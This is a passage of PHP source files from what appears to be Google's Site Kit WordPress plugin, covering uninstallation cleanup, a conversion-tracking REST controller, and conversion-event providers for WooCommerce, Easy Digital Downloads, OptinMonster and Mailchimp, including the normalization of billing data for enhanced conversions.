$this->id = (int) $args['id']; $this->mode = (string) $args['mode']; } /** * Gets the entity URL. * * @since 1.7.0 * * @return string The entity URL. */ public function get_url() { return $this->url; } /** * Gets the entity type. * * @since 1.7.0 * * @return string The entity type, or empty string if unknown. */ public function get_type() { return $this->type; } /** * Gets the entity title. * * @since 1.7.0 * * @return string The entity title, or empty string if unknown. */ public function get_title() { return $this->title; } /** * Gets the entity ID. * * @since 1.7.0 * * @return int The entity ID, or 0 if unknown. */ public function get_id() { return $this->id; } /** * Gets the entity URL sub-variant. * * @since 1.42.0 * * @return string The entity title, or empty string if unknown. */ public function get_mode() { return $this->mode; } } <?php /** * Class Google\Site_Kit\Core\Util\Uninstallation * * @package Google\Site_Kit\Core\Util * @copyright 2021 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Util; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Storage\Options; use Google\Site_Kit\Core\Storage\Encrypted_Options; use Google\Site_Kit\Core\Authentication\Credentials; use Google\Site_Kit\Core\Authentication\Google_Proxy; use Google\Site_Kit\Core\Authentication\Clients\OAuth_Client; use Google\Site_Kit\Core\Email_Reporting\Email_Reporting_Scheduler; use Google\Site_Kit\Core\Remote_Features\Remote_Features_Cron; use Google\Site_Kit\Core\Tags\Google_Tag_Gateway\Google_Tag_Gateway_Cron; use Google\Site_Kit\Modules\Analytics_4\Conversion_Reporting\Conversion_Reporting_Cron; use Google\Site_Kit\Modules\Analytics_4\Synchronize_AdSenseLinked; use Google\Site_Kit\Modules\Analytics_4\Synchronize_AdsLinked; use Google\Site_Kit\Modules\Analytics_4\Synchronize_Property; /** * Utility class for handling uninstallation of the plugin. * * @since 1.20.0 * @access private * @ignore */ class Uninstallation { /** * Plugin context. * * @since 1.20.0 * @var Context */ private $context; /** * Options instance. * * @since 1.20.0 * @var Options */ private $options; /** * List of scheduled events. * * @since 1.136.0 * @var array */ const SCHEDULED_EVENTS = array( Conversion_Reporting_Cron::CRON_ACTION, Email_Reporting_Scheduler::ACTION_INITIATOR, Email_Reporting_Scheduler::ACTION_WORKER, Email_Reporting_Scheduler::ACTION_FALLBACK, Email_Reporting_Scheduler::ACTION_MONITOR, Email_Reporting_Scheduler::ACTION_CLEANUP, OAuth_Client::CRON_REFRESH_PROFILE_DATA, Remote_Features_Cron::CRON_ACTION, Synchronize_AdSenseLinked::CRON_SYNCHRONIZE_ADSENSE_LINKED, Synchronize_AdsLinked::CRON_SYNCHRONIZE_ADS_LINKED, Synchronize_Property::CRON_SYNCHRONIZE_PROPERTY, Google_Tag_Gateway_Cron::CRON_ACTION, ); /** * Constructor. * * This class and its logic must be instantiated early in the WordPress * bootstrap lifecycle because the 'uninstall.php' script runs decoupled * from regular action hooks like 'init'. * * @since 1.20.0 * * @param Context $context Plugin context. * @param Options $options Optional. Options instance. Default is a new instance. */ public function __construct( Context $context, ?Options $options = null ) { $this->context = $context; $this->options = $options ?: new Options( $this->context ); } /** * Registers functionality through WordPress hooks. * * @since 1.20.0 */ public function register() { add_action( 'googlesitekit_uninstallation', function () { $this->uninstall(); $this->clear_scheduled_events(); } ); add_action( 'googlesitekit_deactivation', function () { $this->clear_scheduled_events(); } ); add_action( 'googlesitekit_reset', function () { $this->clear_scheduled_events(); } ); } /** * Runs necessary logic for uninstallation of the plugin. * * If connected to the proxy, it will issue a request to unregister the site. * * @since 1.20.0 */ private function uninstall() { $credentials = new Credentials( new Encrypted_Options( $this->options ) ); if ( $credentials->has() && $credentials->using_proxy() ) { $google_proxy = new Google_Proxy( $this->context ); $google_proxy->unregister_site( $credentials ); } } /** * Clears all scheduled events. * * @since 1.136.0 */ private function clear_scheduled_events() { foreach ( self::SCHEDULED_EVENTS as $event ) { // Only clear scheduled events that are set, important in E2E // testing. if ( $this->is_event_scheduled( $event ) ) { wp_unschedule_hook( $event ); } } } /** * Determines if an event is scheduled for the given hook, regardless of arguments. * * @since 1.168.0 * * @param string $hook The hook name. * @return bool True if an event is scheduled for the hook, false otherwise. */ private function is_event_scheduled( $hook ) { $crons = _get_cron_array(); if ( ! is_array( $crons ) || empty( $crons ) ) { return false; } foreach ( $crons as $events ) { if ( isset( $events[ $hook ] ) ) { return true; } } return false; } } <?php /** * Class Google\Site_Kit\Core\Conversion_Tracking\Conversion_Events_Provider * * @package Google\Site_Kit\Core\Conversion_Tracking * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Conversion_Tracking; use Google\Site_Kit\Context; use Google\Site_Kit\Core\Assets\Script; /** * Base class for conversion events provider. * * @since 1.125.0 * @since 1.126.0 Changed from interface to abstract class. * @access private * @ignore */ abstract class Conversion_Events_Provider { /** * Plugin context. * * @since 1.126.0 * @var Context */ protected $context; /** * Constructor. * * @since 1.126.0 * * @param Context $context Plugin context. */ public function __construct( Context $context ) { $this->context = $context; } /** * Checks if the provider is active. * * @since 1.125.0 * * @return bool True if the provider is active, false otherwise. */ public function is_active() { return false; } /** * Gets the conversion event names that are tracked by this provider. * * @since 1.154.0 * * @return string Comma separated list of event names. */ public function get_debug_data() { return implode( ', ', $this->get_event_names() ); } /** * Gets the event names. * * @since 1.125.0 * * @return array List of event names. */ abstract public function get_event_names(); /** * Gets the enhanced conversion event names. * * @since 1.165.0 * * @return array List of enhanced conversion event names. Default empty array. */ public function get_enhanced_event_names() { return array(); } /** * Registers any actions/hooks for this provider. * * @since 1.129.0 */ public function register_hooks() { // No-op by default, but left here so subclasses can implement // their own `add_action`/hook calls. } /** * Registers the script for the provider. * * @since 1.125.0 * * @return Script|null Script instance, or null if no script is registered. */ abstract public function register_script(); } <?php /** * Class Google\Site_Kit\Core\Conversion_Tracking\REST_Conversion_Tracking_Controller * * @package Google\Site_Kit\Core\Conversion_Tracking * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Conversion_Tracking; use Google\Site_Kit\Core\Permissions\Permissions; use Google\Site_Kit\Core\REST_API\REST_Route; use Google\Site_Kit\Core\REST_API\REST_Routes; use WP_REST_Request; use WP_REST_Response; use WP_REST_Server; /** * Class for handling rest routes for Conversion Tracking settings. * * @since 1.127.0 * @access private * @ignore */ class REST_Conversion_Tracking_Controller { /** * Conversion_Tracking_Settings instance. * * @since 1.127.0 * @var Conversion_Tracking_Settings */ protected $settings; /** * Constructor. * * @since 1.127.0 * * @param Conversion_Tracking_Settings $settings Conversion Tracking settings. */ public function __construct( Conversion_Tracking_Settings $settings ) { $this->settings = $settings; } /** * Registers functionality through WordPress hooks. * * @since 1.127.0 */ public function register() { add_filter( 'googlesitekit_rest_routes', function ( $routes ) { return array_merge( $routes, $this->get_rest_routes() ); } ); add_filter( 'googlesitekit_apifetch_preload_paths', function ( $paths ) { return array_merge( $paths, array( '/' . REST_Routes::REST_ROOT . '/core/site/data/conversion-tracking', ) ); } ); } /** * Gets REST route instances. * * @since 1.127.0 * * @return REST_Route[] List of REST_Route objects. */ protected function get_rest_routes() { $has_capabilities = function () { return current_user_can( Permissions::MANAGE_OPTIONS ); }; return array( new REST_Route( 'core/site/data/conversion-tracking', array( 'methods' => WP_REST_Server::READABLE, 'callback' => function () { return new WP_REST_Response( $this->settings->get() ); }, 'permission_callback' => $has_capabilities, ) ), new REST_Route( 'core/site/data/conversion-tracking', array( 'methods' => WP_REST_Server::EDITABLE, 'callback' => function ( WP_REST_Request $request ) { $this->settings->set( $request['data']['settings'] ); return new WP_REST_Response( $this->settings->get() ); }, 'permission_callback' => $has_capabilities, 'args' => array( 'data' => array( 'type' => 'object', 'required' => true, 'properties' => array( 'settings' => array( 'type' => 'object', 'required' => true, 'properties' => array( 'enabled' => array( 'type' => 'boolean', 'required' => true, ), ), ), ), ), ), ) ), ); } } <?php /** * Class Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers\WooCommerce * * @package Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers; use Google\Site_Kit\Core\Assets\Script; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Events_Provider; use Google\Site_Kit\Core\Util\Feature_Flags; use Google\Site_Kit\Core\Tags\Enhanced_Conversions\Enhanced_Conversions; use WC_Countries; use WC_Order; use WC_Order_Item_Product; use WC_Product; /** * Class for handling WooCommerce conversion events. * * @since 1.127.0 * @access private * @ignore */ class WooCommerce extends Conversion_Events_Provider { const CONVERSION_EVENT_PROVIDER_SLUG = 'woocommerce'; /** * Available products on the page. * * @var array * * @since 1.153.0 */ protected $products = array(); /** * Current product added to the cart. * * @since 1.153.0 * @var WC_Product */ protected $add_to_cart; /** * Checks if the WooCommerce plugin is active. * * @since 1.127.0 * * @return bool True if WooCommerce is active, false otherwise. */ public function is_active() { return class_exists( 'WooCommerce' ); } /** * Gets the conversion event names that are tracked by this provider, and Google Analytics for WooCommerce addon when active. * * @since 1.127.0 * * @return array List of event names. */ public function get_event_names() { $wgai_event_names = $this->get_wgai_event_names(); $events_to_track = $this->events_to_track(); return array_unique( array_merge( $events_to_track, $wgai_event_names ) ); } /** * Gets the enhanced conversion event names that are tracked by this provider. * * @since 1.165.0 * * @return array List of enhanced conversion event names. */ public function get_enhanced_event_names() { return array( 'add_to_cart', 'purchase' ); } /** * Gets the conversion event names that are tracked by Google Analytics for WooCommerce provider. * * @since 1.154.0 * * @return array List of event names. */ protected function get_wgai_event_names() { if ( ! class_exists( 'WC_Google_Analytics_Integration' ) ) { return array(); } $settings = get_option( 'woocommerce_google_analytics_settings' ); // If only product identifier is available in the saved settings, it means default options are used. // And by default all events are tracked. if ( isset( $settings['ga_product_identifier'] ) && count( $settings ) === 1 ) { return array( 'purchase', 'add_to_cart', 'remove_from_cart', 'view_item_list', 'select_content', 'view_item', 'begin_checkout', ); } $event_mapping = array( 'ga_ecommerce_tracking_enabled' => 'purchase', 'ga_event_tracking_enabled' => 'add_to_cart', 'ga_enhanced_remove_from_cart_enabled' => 'remove_from_cart', 'ga_enhanced_product_impression_enabled' => 'view_item_list', 'ga_enhanced_product_click_enabled' => 'select_content', 'ga_enhanced_product_detail_view_enabled' => 'view_item', 'ga_enhanced_checkout_process_enabled' => 'begin_checkout', ); $event_names = array(); foreach ( $event_mapping as $setting_key => $event_name ) { if ( isset( $settings[ $setting_key ] ) && 'yes' === $settings[ $setting_key ] ) { $event_names[] = $event_name; } } return $event_names; } /** * Gets the conversion event names that should be tracked by this provider. * * @since 1.154.0 * * @return array List of event names. */ protected function events_to_track() { $event_names = array( 'add_to_cart', 'purchase' ); $wgai_event_name = $this->get_wgai_event_names(); if ( ! empty( $wgai_event_name ) ) { return array_values( array_diff( $event_names, $wgai_event_name ) ); } return $event_names; } /** * Gets the conversion event names that are tracked by this provider. * * @since 1.154.0 * * @return string Comma separated list of event names. */ public function get_debug_data() { if ( empty( $this->events_to_track() ) ) { return esc_html__( 'Events tracked through Analytics integration addon', 'google-site-kit' ); } return parent::get_debug_data(); } /** * Registers the script for the provider. * * @since 1.127.0 * * @return Script Script instance. */ public function register_script() { $script = new Script( 'googlesitekit-events-provider-' . self::CONVERSION_EVENT_PROVIDER_SLUG, array( 'src' => $this->context->url( 'dist/assets/js/googlesitekit-events-provider-woocommerce.js' ), 'execution' => 'defer', 'dependencies' => array( 'woocommerce' ), ) ); $script->register( $this->context ); return $script; } /** * Adds a hook for a purchase event. * * @since 1.129.0 */ public function register_hooks() { add_filter( 'woocommerce_loop_add_to_cart_link', function ( $button, $product ) { // If the product is not a valid WC_Product instance, return // early. if ( ! $product instanceof WC_Product ) { return $button; } $this->products[] = $this->get_formatted_product( $product ); return $button; }, 10, 2 ); add_action( 'woocommerce_add_to_cart', function ( $cart_item_key, $product_id, $quantity, $variation_id, $variation ) { $product = wc_get_product( $product_id ); if ( ! $product instanceof WC_Product ) { return; } $this->add_to_cart = $this->get_formatted_product( $product, $variation_id, $variation, $quantity ); }, 10, 5 ); add_action( 'woocommerce_thankyou', fn( $order_id ) => $this->maybe_add_purchase_inline_script( $order_id, wp_is_block_theme() ), 10, 1 ); add_action( 'wp_footer', function () { $script_slug = 'googlesitekit-events-provider-' . self::CONVERSION_EVENT_PROVIDER_SLUG; $events_to_track = $this->events_to_track(); $inline_script = join( "\n", array( 'window._googlesitekit.wcdata = window._googlesitekit.wcdata || {};', sprintf( 'window._googlesitekit.wcdata.products = %s;', wp_json_encode( $this->products ) ), sprintf( 'window._googlesitekit.wcdata.add_to_cart = %s;', wp_json_encode( $this->add_to_cart ) ), sprintf( 'window._googlesitekit.wcdata.currency = "%s";', esc_js( get_woocommerce_currency() ) ), sprintf( 'window._googlesitekit.wcdata.eventsToTrack = %s;', wp_json_encode( $events_to_track ) ), ) ); if ( is_wc_endpoint_url( 'order-received' ) && wp_is_block_theme() ) { $order_id = absint( get_query_var( 'order-received' ) ); $this->maybe_add_purchase_inline_script( $order_id ); } wp_add_inline_script( $script_slug, $inline_script, 'before' ); } ); } /** * Returns an array of product data in the required format. * Adapted from https://github.com/woocommerce/woocommerce-google-analytics-integration * * @since 1.153.0 * * @param WC_Product $product The product to format. * @param int $variation_id Variation product ID. * @param array|bool $variation An array containing product variation attributes to include in the product data. * For the "variation" type products, we'll use product->get_attributes. * @param bool|int $quantity Quantity to include in the formatted product object. * * @return array */ protected function get_formatted_product( WC_Product $product, $variation_id = 0, $variation = false, $quantity = false ) { $product_id = $product->is_type( 'variation' ) ? $product->get_parent_id() : $product->get_id(); $price = $product->get_price(); // Get product price from chosen variation if set. if ( $variation_id ) { $variation_product = wc_get_product( $variation_id ); if ( $variation_product ) { $price = $variation_product->get_price(); } } // Integration with Product Bundles. // Get the minimum price, as `get_price` may return 0 if the product is a bundle and the price is potentially a range. // Even a range containing a single value. if ( $product->is_type( 'bundle' ) && is_callable( array( $product, 'get_bundle_price' ) ) ) { $price = $product->get_bundle_price( 'min' ); } $formatted = array( 'id' => $product_id, 'name' => $product->get_title(), 'categories' => array_map( fn( $category ) => array( 'name' => $category->name ), wc_get_product_terms( $product_id, 'product_cat', array( 'number' => 5 ) ) ), 'price' => $this->get_formatted_price( $price ), ); if ( $quantity ) { $formatted['quantity'] = (int) $quantity; } if ( $product->is_type( 'variation' ) ) { $variation = $product->get_attributes(); } if ( is_array( $variation ) ) { $formatted['variation'] = implode( ', ', array_map( function ( $attribute, $value ) { return sprintf( '%s: %s', str_replace( 'attribute_', '', $attribute ), $value ); }, array_keys( $variation ), array_values( $variation ) ) ); } return $formatted; } /** * Returns an array of order data in the required format. * Adapted from https://github.com/woocommerce/woocommerce-google-analytics-integration * * @since 1.153.0 * * @param WC_Order $order An instance of the WooCommerce Order object. * * @return array */ public function get_formatted_order( $order ) { $order_data = array( 'id' => $order->get_id(), 'affiliation' => get_bloginfo( 'name' ), 'totals' => array( 'currency_code' => $order->get_currency(), 'tax_total' => $this->get_formatted_price( $order->get_total_tax() ), 'shipping_total' => $this->get_formatted_price( $order->get_total_shipping() ), 'total_price' => $this->get_formatted_price( $order->get_total() ), ), 'items' => array_map( function ( $item ) { // If the product is not a valid WC_Product instance, return early. if ( ! $item instanceof WC_Order_Item_Product || ! $item->get_product() instanceof WC_Product ) { return $item; } $formatted_product = $this->get_formatted_product( $item->get_product() ); return array_merge( $formatted_product, array( 'quantity' => $item->get_quantity(), 'price_after_coupon_discount' => $this->get_formatted_price( $item->get_total() ), ) ); }, array_values( $order->get_items() ), ), ); if ( Feature_Flags::enabled( 'gtagUserData' ) && $order instanceof WC_Order ) { $user_data = $this->extract_user_data_from_order( $order ); if ( ! empty( $user_data ) ) { $order_data['user_data'] = $user_data; } } return $order_data; } /** * Extracts and normalizes user data from WooCommerce order for Enhanced Conversions. * * @since 1.161.0 * * @param WC_Order $order An instance of the WooCommerce Order object. * * @return array Normalized user data or empty array if no supported fields are available. */ protected function extract_user_data_from_order( WC_Order $order ) { $user_data = array(); // Extract billing information from the order. $billing_email = $order->get_billing_email(); $billing_phone = $order->get_billing_phone(); $billing_first_name = $order->get_billing_first_name(); $billing_last_name = $order->get_billing_last_name(); $billing_address_1 = $order->get_billing_address_1(); $billing_city = $order->get_billing_city(); $billing_state = $order->get_billing_state(); $billing_postcode = $order->get_billing_postcode(); $billing_country = $order->get_billing_country(); // Normalize and add email if available. if ( ! empty( $billing_email ) ) { $user_data['email'] = Enhanced_Conversions::get_normalized_email( $billing_email ); } // Normalize and add phone number if available. if ( ! empty( $billing_phone ) ) { $normalized_phone = $this->get_normalized_phone( $billing_phone, $billing_country ); if ( ! empty( $normalized_phone ) ) { $user_data['phone_number'] = $normalized_phone; } } // Build address object if any address fields are available. $address_data = array(); if ( ! empty( $billing_first_name ) ) { $address_data['first_name'] = Enhanced_Conversions::get_normalized_value( $billing_first_name ); } if ( ! empty( $billing_last_name ) ) { $address_data['last_name'] = Enhanced_Conversions::get_normalized_value( $billing_last_name ); } if ( ! empty( $billing_address_1 ) ) { $address_data['street'] = Enhanced_Conversions::get_normalized_value( $billing_address_1 ); } if ( ! empty( $billing_city ) ) { $address_data['city'] = Enhanced_Conversions::get_normalized_value( $billing_city ); } if ( ! empty( $billing_state ) ) { $address_data['region'] = Enhanced_Conversions::get_normalized_value( $billing_state ); } if ( ! empty( $billing_postcode ) ) { $address_data['postal_code'] = Enhanced_Conversions::get_normalized_value( $billing_postcode ); } if ( ! empty( $billing_country ) ) { $address_data['country'] = Enhanced_Conversions::get_normalized_value( $billing_country ); } // Only include address if it has at least one field. if ( ! empty( $address_data ) ) { $user_data['address'] = $address_data; } return $user_data; } /** * Gets a normalized phone number for Enhanced Conversions. * * @since 1.161.0 * * @param string $phone The phone number to normalize. * @param string $country The country code (2-letter ISO 3166-1 alpha-2). * @return string Normalized phone number (E.164 format if possible, basic normalization otherwise). */ protected function get_normalized_phone( $phone, $country ) { if ( empty( $phone ) ) { return ''; } // Check if the original input started with + (user explicitly provided country code). $original_started_with_plus = strpos( trim( $phone ), '+' ) === 0; // Remove any non-digit characters. $phone_digits = preg_replace( '/[^0-9]/', '', $phone ); // Skip if phone is empty after cleaning. if ( empty( $phone_digits ) ) { return ''; } // Try to use WooCommerce's country calling codes for proper E.164 formatting. if ( class_exists( 'WC_Countries' ) && ! empty( $country ) ) { $countries = new WC_Countries(); $calling_code = $countries->get_country_calling_code( $country ); // If we have a valid calling code, format to E.164. if ( ! empty( $calling_code ) ) { // Extract country code digits (without the + sign). $country_code_digits = ltrim( $calling_code, '+' ); // Check if the phone number starts with 00 (international dialing format). // This is commonly used instead of + in many countries. // To distinguish from national numbers with leading zeros, ensure that after // stripping 00, there are at least 10 digits remaining (country code + number). $starts_with_00_international = false; if ( strpos( $phone_digits, '00' ) === 0 && strlen( $phone_digits ) > 2 ) { $digits_after_00 = substr( $phone_digits, 2 ); $starts_with_00_international = strlen( $digits_after_00 ) >= 10; } // Check if the phone number already starts with the billing country code. if ( strpos( $phone_digits, $country_code_digits ) === 0 ) { // Phone already has the correct country code, just add + and validate. $phone = '+' . $phone_digits; } elseif ( $starts_with_00_international ) { // Phone starts with 00 (international dialing format). // Strip the 00 prefix and format as E.164. // This handles any country code, not just the billing country. $phone = '+' . substr( $phone_digits, 2 ); } elseif ( $original_started_with_plus ) { // User explicitly entered a +, indicating they provided their own country code. // Trust their input and use their number as-is. $phone = '+' . $phone_digits; } else { // No country code detected, treat as national number. // Remove leading zeros from the national number. $phone_digits = ltrim( $phone_digits, '0' ); // Skip if phone is empty after removing leading zeros. if ( empty( $phone_digits ) ) { return ''; } // Prepend the calling code (which already includes the + sign). $phone = $calling_code . $phone_digits; } // Validate the number is the correct length (11-15 digits including +). if ( strlen( $phone ) < 11 || strlen( $phone ) > 15 ) { return ''; } return $phone; } } // Fallback: use Enhanced_Conversions basic normalization if WooCommerce is unavailable // or country calling code cannot be determined. return Enhanced_Conversions::get_normalized_value( $phone ); } /** * Formats a price the same way WooCommerce Blocks does. * Taken from https://github.com/woocommerce/woocommerce-google-analytics-integration * * @since 1.153.0 * * @param mixed $value The price value for format. * * @return int */ public function get_formatted_price( $value ) { return intval( round( ( (float) wc_format_decimal( $value ) ) * ( 10 ** absint( wc_get_price_decimals() ) ), 0 ) ); } /** * Prints the purchase event details. * * @since 1.154.0 * * @param int $order_id The order ID. * @param bool $skip_meta_value_save Whether to skip saving the _googlesitekit_ga_purchase_event_tracked meta value. */ protected function maybe_add_purchase_inline_script( $order_id, $skip_meta_value_save = false ) { $wgai_event_names = $this->get_wgai_event_names(); // If purchase event is tracked by the Google Analytics for WooCommerce addon, // don't output the script tag to track the purchase event. if ( in_array( 'purchase', $wgai_event_names, true ) ) { return; } $input = $this->context->input(); $order = wc_get_order( $order_id ); // If there isn't a valid order for this ID, or if this order // already has a purchase event tracked for it, return early // and don't output the script tag to track the purchase event. if ( ! $order || $order->get_meta( '_googlesitekit_ga_purchase_event_tracked' ) === '1' ) { return; } // Ensure the order key in the query param is valid for this // order. $order_key = $input->filter( INPUT_GET, 'key' ); // Don't output the script tag if the order key is invalid. if ( ! $order->key_is_valid( (string) $order_key ) ) { return; } // In case we are on block theme, this hook running on thank you page will not attach the script. // So we need to skip it, and apply this on the later hook. if ( ! $skip_meta_value_save ) { // Mark the order as tracked by Site Kit. $order->update_meta_data( '_googlesitekit_ga_purchase_event_tracked', 1 ); $order->save(); } wp_add_inline_script( 'googlesitekit-events-provider-' . self::CONVERSION_EVENT_PROVIDER_SLUG, join( "\n", array( 'window._googlesitekit.wcdata = window._googlesitekit.wcdata || {};', sprintf( 'window._googlesitekit.wcdata.purchase = %s;', wp_json_encode( $this->get_formatted_order( $order ) ) ), ) ), 'before' ); } } <?php /** * Class Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers\Easy_Digital_Downloads * * @package Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers; use Google\Site_Kit\Core\Assets\Script; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Events_Provider; use Google\Site_Kit\Core\Util\Feature_Flags; use Google\Site_Kit\Core\Util\Method_Proxy_Trait; use Google\Site_Kit\Core\Tags\Enhanced_Conversions\Enhanced_Conversions; /** * Class for handling Easy Digital Downloads conversion events. * * @since 1.130.0 * @access private * @ignore */ class Easy_Digital_Downloads extends Conversion_Events_Provider { use Method_Proxy_Trait; const CONVERSION_EVENT_PROVIDER_SLUG = 'easy-digital-downloads'; /** * Checks if the Easy Digital Downloads plugin is active. * * @since 1.130.0 * * @return bool True if Easy Digital Downloads is active, false otherwise. */ public function is_active() { return defined( 'EDD_VERSION' ); } /** * Gets the conversion event names that are tracked by this provider. * * @since 1.130.0 * * @return array List of event names. */ public function get_event_names() { $event_names = array( 'add_to_cart' ); if ( Feature_Flags::enabled( 'gtagUserData' ) ) { $event_names[] = 'purchase'; } return $event_names; } /** * Gets the enhanced conversion event names that are tracked by this provider. * * @since 1.165.0 * * @return array List of enhanced conversion event names. */ public function get_enhanced_event_names() { return array( 'add_to_cart' ); } /** * Registers the script for the provider. * * @since 1.130.0 * * @return Script Script instance. */ public function register_script() { $script = new Script( 'googlesitekit-events-provider-' . self::CONVERSION_EVENT_PROVIDER_SLUG, array( 'src' => $this->context->url( 'dist/assets/js/googlesitekit-events-provider-easy-digital-downloads.js' ), 'execution' => 'defer', 'dependencies' => array( 'edd-ajax' ), ) ); $script->register( $this->context ); return $script; } /** * Registers hooks for the Easy Digital Downloads provider. * * @since 1.164.0 */ public function register_hooks() { if ( Feature_Flags::enabled( 'gtagUserData' ) ) { add_action( 'wp_footer', $this->get_method_proxy( 'maybe_add_purchase_data_from_session' ) ); } } /** * Prints the purchase data. * * @since 1.164.0 */ protected function maybe_add_purchase_data_from_session() { if ( ! function_exists( 'edd_get_purchase_session' ) || ! function_exists( 'edd_is_success_page' ) || ! edd_is_success_page() ) { return; } $purchase_session = edd_get_purchase_session(); $purchase_data = $this->get_enhanced_conversions_data_from_session( $purchase_session ); wp_add_inline_script( 'googlesitekit-events-provider-' . self::CONVERSION_EVENT_PROVIDER_SLUG, join( "\n", array( 'window._googlesitekit.edddata = window._googlesitekit.edddata || {};', sprintf( 'window._googlesitekit.edddata.purchase = %s;', wp_json_encode( $purchase_data ) ), ) ), 'before' ); } /** * Extracts Enhanced Conversions data from an EDD session. * * @since 1.164.0 * * @param mixed|array|null $session_data An array containing EDD purchase session data. * * @return array */ protected function get_enhanced_conversions_data_from_session( $session_data ) { if ( ! is_array( $session_data ) ) { return array(); } $user_data = $this->extract_user_data_from_session( $session_data ); if ( empty( $user_data ) ) { return array(); } return array( 'user_data' => $user_data, ); } /** * Extracts user data from an EDD session. * * @since 1.164.0 * * @param array $session_data An array containing EDD purchase session data. * * @return array */ protected function extract_user_data_from_session( $session_data ) { $user_data = array(); $address_data = array(); if ( isset( $session_data['user_info'] ) ) { $email = $session_data['user_info']['email'] ?? $session_data['user_email'] ?? ''; if ( ! empty( $email ) ) { $user_data['email'] = Enhanced_Conversions::get_normalized_email( $email ); } if ( ! empty( $session_data['user_info']['first_name'] ) ) { $address_data['first_name'] = Enhanced_Conversions::get_normalized_value( $session_data['user_info']['first_name'] ); } if ( ! empty( $session_data['user_info']['last_name'] ) ) { $address_data['last_name'] = Enhanced_Conversions::get_normalized_value( $session_data['user_info']['last_name'] ); } if ( isset( $session_data['user_info']['address'] ) ) { if ( ! empty( $session_data['user_info']['address']['phone'] ) ) { $user_data['phone_number'] = Enhanced_Conversions::get_normalized_value( $session_data['user_info']['address']['phone'] ); } if ( ! empty( $session_data['user_info']['address']['line1'] ) ) { $address_data['street'] = Enhanced_Conversions::get_normalized_value( $session_data['user_info']['address']['line1'] ); } if ( ! empty( $session_data['user_info']['address']['city'] ) ) { $address_data['city'] = Enhanced_Conversions::get_normalized_value( $session_data['user_info']['address']['city'] ); } if ( ! empty( $session_data['user_info']['address']['state'] ) ) { $region = $session_data['user_info']['address']['state']; // Attempt to get full region name. if ( function_exists( 'edd_get_state_name' ) && ! empty( $session_data['user_info']['address']['country'] ) ) { $region = edd_get_state_name( $session_data['user_info']['address']['country'], $region ); } $address_data['region'] = Enhanced_Conversions::get_normalized_value( $region ); } if ( ! empty( $session_data['user_info']['address']['zip'] ) ) { $address_data['postal_code'] = Enhanced_Conversions::get_normalized_value( $session_data['user_info']['address']['zip'] ); } if ( ! empty( $session_data['user_info']['address']['country'] ) ) { $address_data['country'] = $session_data['user_info']['address']['country']; } } } if ( ! empty( $address_data ) ) { $user_data['address'] = $address_data; } return $user_data; } } <?php /** * Class Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers\OptinMonster * * @package Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers; use Google\Site_Kit\Core\Assets\Script; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Events_Provider; /** * Class for handling OptinMonster conversion events. * * @since 1.127.0 * @access private * @ignore */ class OptinMonster extends Conversion_Events_Provider { const CONVERSION_EVENT_PROVIDER_SLUG = 'optin-monster'; /** * Checks if the OptinMonster plugin is active. * * @since 1.127.0 * * @return bool True if OptinMonster is active, false otherwise. */ public function is_active() { return defined( 'OMAPI_FILE' ); } /** * Gets the conversion event names that are tracked by this provider. * * @since 1.127.0 * * @return array List of event names. */ public function get_event_names() { return array( 'submit_lead_form' ); } /** * Registers the script for the provider. * * @since 1.127.0 * * @return Script Script instance. */ public function register_script() { $script = new Script( 'googlesitekit-events-provider-' . self::CONVERSION_EVENT_PROVIDER_SLUG, array( 'src' => $this->context->url( 'dist/assets/js/googlesitekit-events-provider-optin-monster.js' ), 'execution' => 'defer', ) ); $script->register( $this->context ); return $script; } } <?php /** * Class Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers\Mailchimp * * @package Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers * @copyright 2024 Google LLC * @license https://www.apache.org/licenses/LICENSE-2.0 Apache License 2.0 * @link https://sitekit.withgoogle.com */ namespace Google\Site_Kit\Core\Conversion_Tracking\Conversion_Event_Providers; use Google\Site_Kit\Core\Assets\Script; use Google\Site_Kit\Core\Conversion_Tracking\Conversion_Events_Provider; /** * Class for handling Mailchimp conversion events. * * @since 1.127.0 * @access private * @ignore */ class Mailchimp extends Conversion_Events_Provider { const CONVERSION_EVENT_PROVIDER_SLUG = 'mailchimp'; /** * Checks if the Mailchimp plugin is active. * * @since 1.127.0 * * @return bool True if Mailchimp is active, false otherwise. */ public function is_active() { return defined( 'MC4WP_VERSION' ); } /** * Gets the conversion event names that are tracked by this provider. * * @since 1.127.0 * * @return array List of event names. */ public function get_event_names() { return array( 'submit_lead_form' ); } /** * Registers the script for the provider. * * @since 1.127.0 * * @return Script Script instance. */ public function register_script() { $script = new Script( 'googlesitekit-events-provider-' . self::CONVERSION_EVENT_PROVIDER_SLUG, array( 'src' => $this->context->url( 'dist/assets/js/googlesitekit-events-provider-mailchimp.js' ), 'execution' => 'defer', 'dependencies' => array( 'mc4wp-forms-api' ), ) ); $script->register( $this->context ); return $script; } } <?php /** * Class 